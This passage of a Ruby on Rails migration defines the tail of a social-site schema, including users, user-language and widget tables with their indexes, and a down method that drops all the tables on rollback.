t.integer "grade_experience"
t.integer "language_id"
t.text "why_joined"
t.text "skills"
t.text "occupation"
t.string "plone_password", :limit => 40
t.string "tmp_password", :limit => 40
t.integer "professional_role_id"
t.string "blog_rss"
t.text "protected_profile"
t.text "public_profile"
end
add_index "users", ["login"], :name => "index_users_on_login"
create_table "users_languages", :force => true do |t|
t.integer "user_id"
t.integer "language_id"
end
add_index "users_languages", ["user_id", "language_id"], :name => "index_users_languages_on_user_id_and_language_id"
add_index "users_languages", ["user_id"], :name => "index_users_languages_on_user_id"
create_table "widgets", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
end
end
def self.down
drop_table 'bag_properties'
drop_table 'bag_property_enums'
drop_table 'bag_property_values'
drop_table 'blogs'
drop_table 'comments'
drop_table 'content_page_versions'
drop_table 'content_pages'
drop_table 'countries'
drop_table 'entries'
drop_table 'feed_items'
drop_table 'feeds'
drop_table 'forums'
drop_table 'friends'
drop_table 'grade_level_experiences'
drop_table 'grade_level_experiences_users'
drop_table 'groups'
drop_table 'interests'
drop_table 'interests_users'
drop_table 'languages'
drop_table 'languages_users'
drop_table 'logos'
drop_table 'membership_requests'
drop_table 'memberships'
drop_table 'messages'
drop_table 'news_items'
drop_table 'open_id_authentication_associations'
drop_table 'open_id_authentication_nonces'
drop_table 'permissions'
drop_table 'photos'
drop_table 'plone_group_roles'
drop_table 'plone_open_roles'
drop_table 'professional_roles'
drop_table 'roles'
drop_table 'sessions'
drop_table 'shared_entries'
drop_table 'shared_pages'
drop_table 'shared_uploads'
drop_table 'sites'
drop_table 'states'
drop_table 'taggings'
drop_table 'tags'
drop_table 'uploads'
drop_table 'users'
drop_table 'users_languages'
drop_table 'widgets'
end
end
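# Hypothetical invocation sketch (standard Rake tasks for this migration style,
# not part of the original file):
#   rake db:migrate    # runs self.up and creates every table above
#   rake db:rollback   # runs self.down and drops them again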
| 34.724739 | 141 | 0.59116 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.